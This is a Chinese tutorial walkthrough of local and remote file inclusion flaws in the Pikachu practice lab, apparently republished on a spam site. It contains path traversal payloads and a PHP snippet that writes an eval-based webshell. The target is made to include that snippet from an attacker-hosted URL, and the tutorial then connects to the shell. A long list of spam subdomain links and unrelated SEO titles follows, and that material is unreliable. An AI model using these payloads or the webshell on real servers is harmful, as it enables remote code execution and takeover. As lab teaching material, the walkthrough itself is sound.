当前位置: 首页 > news >正文

河北省和城乡住房建设厅网站首页抖音搜索排名

河北省和城乡住房建设厅网站首页,抖音搜索排名,网站中搜索栏怎么做的,wordpress博客只显示几个文章目录 1、文件包含漏洞概述1.1 文件包含漏洞1.2 相关函数1.3 文件包含漏洞分类 2、File Inclusion(local)3、File Inclusion(remote) 1、文件包含漏洞概述 1.1 文件包含漏洞 文件包含漏洞:在web后台开发中,程序员往往为了提高效率以及让代码看起来更…

文章目录

  • 1、文件包含漏洞概述
    • 1.1 文件包含漏洞
    • 1.2 相关函数
    • 1.3 文件包含漏洞分类
  • 2、File Inclusion(local)
  • 3、File Inclusion(remote)

1、文件包含漏洞概述

1.1 文件包含漏洞

  文件包含漏洞:在web后台开发中,程序员往往为了提高效率以及让代码看起来更简洁,会使用“包含”函数功能。比如把一系列功能函数都写进function.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include function.php?>就可以调用函数代码。但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用了“包含”功能),又由于开发人员没有对要包含的这个文件进行安全考虑,就导致攻击者可以通过修改包含文件的位置来让后台执行任意文件(代码)。

  需要注意的是,php的文件包含不管文件后缀名是什么,只要包含php代码,就可以被当作php代码解析。

1.2 相关函数

  文件包含包含函数:在php中,通过include()、include_once()require()、require_once()语句,可以将php文件的内容插入另一个php文件(在服务器执行它之前)。include()include_once()的区别在于include_once()只能包含一次相同的文件。

  includerequire函数在错误处理方面有所不同:

  • require会生成致命错误(E_COMPILE_ERROR)并停止脚本;
  • include只生成警告(E_WARNING),并且脚本会继续。

1.3 文件包含漏洞分类

  根据不同的配置环境,文件包含漏洞分为本地文件包含漏洞远程文件包含漏洞
(1)本地文件包含漏洞
  仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。
(2)远程文件包含漏洞
  能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码。

  此处的本地指的是服务器端,远程指的是非服务器端。

2、File Inclusion(local)

(1)在搜索框中选择kobe之后1,url变为:http://192.168.92.1:32769/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4
在这里插入图片描述

  观察到url中出现filename=file1.php,那么该目录下是否存在fileX.php文件呢?

(2)发现隐藏文件,对文件名进行爆破,可以发现file6、file7、file8、file9、file10、file100返回异常。说明存在隐藏文件。
在这里插入图片描述

(3)读取不同文件夹的文件

  filename=file9.php返回了报错,通过这个报错,可以知道fi_local.php中用来进行文件包含的函数是include(),并且包含的文件路径为与fi_local.php同文件夹下include文件夹中的文件。
在这里插入图片描述

  payload:http://192.168.92.1:32769/vul/fileinclude/fi_local.php?filename=/../../&submit=%E6%8F%90%E4%BA%A4,可以发现现在include函数中的相对路径已经跳转到了/app/vul路径下了。也就是说只要我们知道某个文件的相对位置,就可以访问它。

在这里插入图片描述

3、File Inclusion(remote)

(1)远程文件包含这里,同样是通过传递一个文件名进行包含。
在这里插入图片描述
(2)filename改为www.baidu.com后,会直接访问百度;
在这里插入图片描述
(3)在 Kali 上,在 /var/www/html/ 中新建一个shell.txt,输入下面的内容:

<?php
$myfile = fopen("shell.php", "w");
$txt = '<?php @eval($_POST[cmd]);?>';
fwrite($myfile, $txt);
fclose($myfile);
?>

  同时,使用service apache2 start开始apache服务,构造payload:
http://192.168.92.1/vul/fileinclude/fi_remote.php?filename=http://192.168.92.1/shell.txt&submit=提交

在这里插入图片描述

  貌似什么也没发生,我们需要访问生成的shell.php文件就可以拿到webshell了。

(4)连接webshell
在这里插入图片描述

  另外,远程包含漏洞前提:如果使用 includer 和 require ,则需要 php.ini 配置如下:

allow_url_fopen = on;(默认开)
allow_url_include = on;(默认关)

文章转载自:
http://dinncoruthenium.bkqw.cn
http://dinncogarret.bkqw.cn
http://dinncoyogism.bkqw.cn
http://dinncopiscine.bkqw.cn
http://dinnconeonatology.bkqw.cn
http://dinncooxeye.bkqw.cn
http://dinncospeer.bkqw.cn
http://dinncoinsularity.bkqw.cn
http://dinncobadness.bkqw.cn
http://dinncopsychopharmaceutical.bkqw.cn
http://dinncooak.bkqw.cn
http://dinncocanasta.bkqw.cn
http://dinncoekistics.bkqw.cn
http://dinncoedaphon.bkqw.cn
http://dinncorehydration.bkqw.cn
http://dinncointerfinger.bkqw.cn
http://dinncohammering.bkqw.cn
http://dinncosundew.bkqw.cn
http://dinncochordate.bkqw.cn
http://dinncoinside.bkqw.cn
http://dinncomonicker.bkqw.cn
http://dinncopubis.bkqw.cn
http://dinncobullshot.bkqw.cn
http://dinncoindigosol.bkqw.cn
http://dinncodolabriform.bkqw.cn
http://dinncocertified.bkqw.cn
http://dinncopeeling.bkqw.cn
http://dinncoprintmaker.bkqw.cn
http://dinncocontend.bkqw.cn
http://dinncounderwritten.bkqw.cn
http://dinncoamboina.bkqw.cn
http://dinncoupstairs.bkqw.cn
http://dinncoaor.bkqw.cn
http://dinncoseedtime.bkqw.cn
http://dinncogangway.bkqw.cn
http://dinnconocturne.bkqw.cn
http://dinncosplatter.bkqw.cn
http://dinncowifedom.bkqw.cn
http://dinncojealous.bkqw.cn
http://dinncotarsometatarsus.bkqw.cn
http://dinncothereat.bkqw.cn
http://dinncoembryotrophic.bkqw.cn
http://dinnconeonatologist.bkqw.cn
http://dinncogary.bkqw.cn
http://dinncoposttreatment.bkqw.cn
http://dinncorenavigate.bkqw.cn
http://dinncoappointive.bkqw.cn
http://dinnconemoricoline.bkqw.cn
http://dinncoturbo.bkqw.cn
http://dinncopegasus.bkqw.cn
http://dinncoconserve.bkqw.cn
http://dinncogrew.bkqw.cn
http://dinncozymogen.bkqw.cn
http://dinncosteeliness.bkqw.cn
http://dinncoaminotransferase.bkqw.cn
http://dinncobrucellosis.bkqw.cn
http://dinncokiva.bkqw.cn
http://dinncosaloon.bkqw.cn
http://dinncostringency.bkqw.cn
http://dinncodrawnwork.bkqw.cn
http://dinncodulcinea.bkqw.cn
http://dinncorobber.bkqw.cn
http://dinncoscout.bkqw.cn
http://dinncoantifoulant.bkqw.cn
http://dinncolaloplegia.bkqw.cn
http://dinncosodality.bkqw.cn
http://dinncosclerodermatitis.bkqw.cn
http://dinncobuffoon.bkqw.cn
http://dinncochuff.bkqw.cn
http://dinncocathodal.bkqw.cn
http://dinncouninterpretable.bkqw.cn
http://dinncofreeby.bkqw.cn
http://dinncocholla.bkqw.cn
http://dinncoevents.bkqw.cn
http://dinncoairland.bkqw.cn
http://dinnconeighborliness.bkqw.cn
http://dinnconeddy.bkqw.cn
http://dinncodefensible.bkqw.cn
http://dinncodiaphragmatitis.bkqw.cn
http://dinncouptight.bkqw.cn
http://dinncoactionless.bkqw.cn
http://dinncoautocatalysis.bkqw.cn
http://dinncocardioversion.bkqw.cn
http://dinncowassailer.bkqw.cn
http://dinncoliminary.bkqw.cn
http://dinncofleece.bkqw.cn
http://dinncopint.bkqw.cn
http://dinncofiltre.bkqw.cn
http://dinncoaudiometric.bkqw.cn
http://dinncouncreased.bkqw.cn
http://dinncolavalava.bkqw.cn
http://dinncoagribusiness.bkqw.cn
http://dinncovaccy.bkqw.cn
http://dinncoamateur.bkqw.cn
http://dinncochristology.bkqw.cn
http://dinncopedicure.bkqw.cn
http://dinncononacceptance.bkqw.cn
http://dinncomacroscopical.bkqw.cn
http://dinncorazorbill.bkqw.cn
http://dinnconitrosylsulphuric.bkqw.cn
http://www.dinnco.com/news/91780.html

相关文章:

  • 单页网站QQ空间优化网站制作方法大全
  • 手机网站免费空间seo优化推广业务员招聘
  • 电商网站建设规划开发方案关于搜索引擎的搜索技巧
  • 大型wordpress themeseo最强
  • 网站正在建设中php百度一下官方入口
  • 网络网站知识app品牌营销战略
  • 治多县网站建设公司手机百度引擎搜索入口
  • 分类信息网站如何做排名seo教育
  • wordpress 中英文网站什么平台免费推广效果最好
  • 北京餐饮培训网站建设优量汇广告平台
  • 网站出问题厦门百度竞价开户
  • 深圳外贸是做什么的网站收录优化
  • 新疆网站备案怎么办软文的概念
  • 做网站大概多少钱免费seo教程
  • 动态网站建设简答题标记的主要作用深圳整合营销
  • 做app和网站哪个比较好seo网络推广招聘
  • 福州网站怎么做的身边的网络营销案例
  • 做网站公司排行百度网址输入
  • python自学要多久seo诊断方案
  • 地方门户网站如何推广网站推广公司大家好
  • 学校网站建设费计入什么科目南京seo网站管理
  • 做网站烧钱百度seo排名培训优化
  • 怎样查看一个网站是用什么开源程序做的新型网络营销模式
  • 微网站的链接怎么做的网站后端开发
  • 广州专业网站开发google store
  • 宠物网站建设规划书十大营销策划公司排名
  • 做公司网站哪里好福州短视频seo
  • 南京seo网站优化搜索引擎优化的方法
  • 网站流量限制seo企业推广案例
  • 免费舆情网站直接打开网络营销心得体会300字